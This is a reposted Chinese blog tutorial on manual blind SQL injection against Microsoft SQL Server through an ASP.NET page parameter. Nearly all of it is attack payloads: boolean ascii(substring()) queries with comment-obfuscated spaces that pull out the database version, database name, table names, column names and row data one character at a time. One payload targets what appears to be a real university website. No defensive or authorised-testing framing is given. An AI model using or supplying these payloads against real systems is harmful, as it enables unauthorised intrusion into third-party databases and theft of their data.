mssql手工注入2

本文详细介绍了如何通过SQL注入攻击获取数据库版本、名称、表名、字段名及数据的方法。使用了具体的URL实例来演示每一步操作的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

--+
先说一些函数的说明:
substring(str,start,len) 截取字符串的作用,第一个参数为要截取的字符串,第二个参数为从哪里开始截取,第三个参数为截取的长度 ascii(char) 把字符转换为ascii值
--+


爆数据库版本: md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>0-- 正常页面 wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))>100-- 不正常页面 说明@@version的第一个字母的ascii 的范围是在0到100 之间 md.aspx?c=c1'/**/and/**/ascii(substring(@@version,1,1))=77-- 正常页面,说明@@version的第一个字母的ascii 的值是77,查表可知为M 第二个字母的注入为: md.aspx?c=c1'/**/and/**/ascii(substring(@@version,2,1))>0--



爆当前数据库名字:
md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200--
其他字符按爆版本号方法类似


爆表:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1 name/**/from/**/库.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0
爆第二张表:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/库.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0 and name not in('表1')),1,1))>0/**/--&t=0

爆表的字段: md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME from/**/库.information_schema.columns/**/where/** /TABLE_NAME='表名1'),1,1))>0/**/--&t=0
爆第二个字段:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/COLUMN_NAME/**/ from/**/库.information_schema.columns/**/where/** /TABLE_NAME='表名1'/**/and/**/COLUMN_NAME/**/not/**/in('字段1')),1,1))>0/**/--&t=0

爆数据:
md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/字段1/**/from/**/表名),1,1))>0/**/--&t=0

 

 

对于这种注入, 如果能用工具, 就用工具, 因为特别的麻烦

 

转载于:https://www.cnblogs.com/perl6/p/6835951.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值